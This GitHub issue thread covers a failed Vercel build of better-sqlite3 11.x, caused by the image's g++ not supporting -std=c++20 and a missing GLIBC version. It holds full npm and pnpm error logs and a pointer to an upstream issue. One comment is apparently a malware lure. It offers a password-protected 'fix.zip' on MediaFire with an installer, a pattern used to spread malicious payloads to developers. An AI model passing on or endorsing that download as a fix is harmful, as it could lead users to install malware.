### ISSUE TITLE
Vercel fails to build with dev-dep better-sqlite3 11.2.1

### ISSUE THREAD

**Issue by jy95** [zeit/now#12040]
Hello,

[Dependabot](https://github.com/apps/dependabot) opened a MR on my repo https://github.com/jy95/jy95.github.io/pull/545 to update better-sqlite3 to 11.2.1, which didn't run as expected

```bash
[11:48:36.837] Running build in Washington, D.C., USA (East) – iad1
[11:48:37.065] Cloning github.com/jy95/jy95.github.io (Branch: dependabot/npm_and_yarn/better-sqlite3-11.2.1, Commit: a4fb6f0)
[11:48:37.828] Cloning completed: 759.594ms
[11:48:49.645] Restored build cache
[11:48:50.080] Running "vercel build"
[11:48:51.846] Vercel CLI 37.1.1
[11:48:52.849] Installing dependencies...
[11:49:49.354] npm error code 1
[11:49:49.356] npm error path /vercel/path0/node_modules/better-sqlite3
[11:49:49.357] npm error command failed
[11:49:49.358] npm error command sh -c prebuild-install || node-gyp rebuild --release
[11:49:49.358] npm error make: Entering directory `/vercel/path0/node_modules/better-sqlite3/build'
[11:49:49.358] npm error   TOUCH ba23eeee118cd63e16015df367567cb043fed872.intermediate
[11:49:49.359] npm error   ACTION deps_sqlite3_gyp_locate_sqlite3_target_copy_builtin_sqlite3 ba23eeee118cd63e16015df367567cb043fed872.intermediate
[11:49:49.359] npm error   TOUCH Release/obj.target/deps/locate_sqlite3.stamp
[11:49:49.359] npm error   CC(target) Release/obj.target/sqlite3/gen/sqlite3/sqlite3.o
[11:49:49.359] npm error rm -f Release/obj.target/deps/sqlite3.a Release/obj.target/deps/sqlite3.a.ar-file-list; mkdir -p `dirname Release/obj.target/deps/sqlite3.a`
[11:49:49.360] npm error ar crs Release/obj.target/deps/sqlite3.a @Release/obj.target/deps/sqlite3.a.ar-file-list
[11:49:49.360] npm error   COPY Release/sqlite3.a
[11:49:49.360] npm error   CXX(target) Release/obj.target/better_sqlite3/src/better_sqlite3.o
[11:49:49.360] npm error rm ba23eeee118cd63e16015df367567cb043fed872.intermediate
[11:49:49.360] npm error make: Leaving directory `/vercel/path0/node_modules/better-sqlite3/build'
[11:49:49.360] npm error prebuild-install warn install /lib64/libm.so.6: version `GLIBC_2.29' not found (required by /vercel/path0/node_modules/better-sqlite3/build/Release/better_sqlite3.node)
[11:49:49.360] npm error gyp info it worked if it ends with ok
[11:49:49.360] npm error gyp info using node-gyp@10.1.0
[11:49:49.360] npm error gyp info using node@18.20.4 | linux | x64
[11:49:49.360] npm error gyp info find Python using Python version 3.9.8 found at "/usr/local/bin/python3"
[11:49:49.361] npm error gyp http GET https://nodejs.org/download/release/v18.20.4/node-v18.20.4-headers.tar.gz
[11:49:49.361] npm error gyp http 200 https://nodejs.org/download/release/v18.20.4/node-v18.20.4-headers.tar.gz
[11:49:49.361] npm error gyp http GET https://nodejs.org/download/release/v18.20.4/SHASUMS256.txt
[11:49:49.361] npm error gyp http 200 https://nodejs.org/download/release/v18.20.4/SHASUMS256.txt
[11:49:49.361] npm error gyp info spawn /usr/local/bin/python3
[11:49:49.361] npm error gyp info spawn args [
[11:49:49.361] npm error gyp info spawn args '/node18/lib/node_modules/npm/node_modules/node-gyp/gyp/gyp_main.py',
[11:49:49.361] npm error gyp info spawn args 'binding.gyp',
[11:49:49.361] npm error gyp info spawn args '-f',
[11:49:49.361] npm error gyp info spawn args 'make',
[11:49:49.362] npm error gyp info spawn args '-I',
[11:49:49.362] npm error gyp info spawn args '/vercel/path0/node_modules/better-sqlite3/build/config.gypi',
[11:49:49.362] npm error gyp info spawn args '-I',
[11:49:49.362] npm error gyp info spawn args '/node18/lib/node_modules/npm/node_modules/node-gyp/addon.gypi',
[11:49:49.362] npm error gyp info spawn args '-I',
[11:49:49.362] npm error gyp info spawn args '/vercel/.cache/node-gyp/18.20.4/include/node/common.gypi',
[11:49:49.362] npm error gyp info spawn args '-Dlibrary=shared_library',
[11:49:49.362] npm error gyp info spawn args '-Dvisibility=default',
[11:49:49.362] npm error gyp info spawn args '-Dnode_root_dir=/vercel/.cache/node-gyp/18.20.4',
[11:49:49.363] npm error gyp info spawn args '-Dnode_gyp_dir=/node18/lib/node_modules/npm/node_modules/node-gyp',
[11:49:49.363] npm error gyp info spawn args '-Dnode_lib_file=/vercel/.cache/node-gyp/18.20.4/<(target_arch)/node.lib',
[11:49:49.363] npm error gyp info spawn args '-Dmodule_root_dir=/vercel/path0/node_modules/better-sqlite3',
[11:49:49.363] npm error gyp info spawn args '-Dnode_engine=v8',
[11:49:49.363] npm error gyp info spawn args '--depth=.',
[11:49:49.363] npm error gyp info spawn args '--no-parallel',
[11:49:49.363] npm error gyp info spawn args '--generator-output',
[11:49:49.363] npm error gyp info spawn args 'build',
[11:49:49.363] npm error gyp info spawn args '-Goutput_dir=.'
[11:49:49.364] npm error gyp info spawn args ]
[11:49:49.364] npm error gyp info spawn make
[11:49:49.364] npm error gyp info spawn args [ 'BUILDTYPE=Release', '-C', 'build' ]
[11:49:49.364] npm error g++: error: unrecognized command line option ‘-std=c++20’; did you mean ‘-std=c++03’?
[11:49:49.364] npm error make: *** [Release/obj.target/better_sqlite3/src/better_sqlite3.o] Error 1
[11:49:49.364] npm error gyp ERR! build error 
[11:49:49.364] npm error gyp ERR! stack Error: `make` failed with exit code: 2
[11:49:49.364] npm error gyp ERR! stack at ChildProcess.<anonymous> (/node18/lib/node_modules/npm/node_modules/node-gyp/lib/build.js:209:23)
[11:49:49.364] npm error gyp ERR! System Linux 5.10.174
[11:49:49.364] npm error gyp ERR! command "/node18/bin/node" "/node18/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js" "rebuild" "--release"
[11:49:49.365] npm error gyp ERR! cwd /vercel/path0/node_modules/better-sqlite3
[11:49:49.365] npm error gyp ERR! node -v v18.20.4
[11:49:49.365] npm error gyp ERR! node-gyp -v v10.1.0
[11:49:49.365] npm error gyp ERR! not ok
[11:49:49.368] 
[11:49:49.368] npm error A complete log of this run can be found in: /vercel/.npm/_logs/2024-08-26T09_48_53_234Z-debug-0.log
[11:49:49.385] Error: Command "npm install" exited with 1
[11:49:49.859] 
```

Thanks in advance

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sebasvil20** [comment]
+1 The issue is happening here too.

Haven't upgraded versions of nothing, just made a deployment an:

```
.../node_modules/better-sqlite3 install:   COPY Release/sqlite3.a
.../node_modules/better-sqlite3 install:   CXX(target) Release/obj.target/better_sqlite3/src/better_sqlite3.o
.../node_modules/better-sqlite3 install: g++: error: unrecognized command line option ‘-std=c++20’; did you mean ‘-std=c++03’?
.../node_modules/better-sqlite3 install: make: *** [Release/obj.target/better_sqlite3/src/better_sqlite3.o] Error 1
.../node_modules/better-sqlite3 install: rm ba23eeee118cd63e16015df367567cb043fed872.intermediate
.../node_modules/better-sqlite3 install: make: Leaving directory `/vercel/path0/node_modules/.pnpm/better-sqlite3@11.5.0/node_modules/better-sqlite3/build'
.../node_modules/better-sqlite3 install: gyp ERR! build error 
.../node_modules/better-sqlite3 install: gyp ERR! stack Error: `make` failed with exit code: 2
.../node_modules/better-sqlite3 install: gyp ERR! stack at ChildProcess.<anonymous> (/pnpm9/node_modules/pnpm/dist/node_modules/node-gyp/lib/build.js:216:23)
.../node_modules/better-sqlite3 install: gyp ERR! System Linux 5.10.174
.../node_modules/better-sqlite3 install: gyp ERR! command "/node18/bin/node" "/pnpm9/node_modules/pnpm/dist/node_modules/node-gyp/bin/node-gyp.js" "rebuild" "--release"
.../node_modules/better-sqlite3 install: gyp ERR! cwd /vercel/path0/node_modules/.pnpm/better-sqlite3@11.5.0/node_modules/better-sqlite3
.../node_modules/better-sqlite3 install: gyp ERR! node -v v18.20.4
.../node_modules/better-sqlite3 install: gyp ERR! node-gyp -v v10.2.0
.../node_modules/better-sqlite3 install: gyp ERR! not ok 
.../node_modules/better-sqlite3 install: Failed
 ELIFECYCLE  Command failed with exit code 1.
Error: Command "pnpm install" exited with 1
```

**Comment by jy95** [comment]
@sebasvil20 Check this https://github.com/WiseLibs/better-sqlite3/issues/1247#issuecomment-2322287457
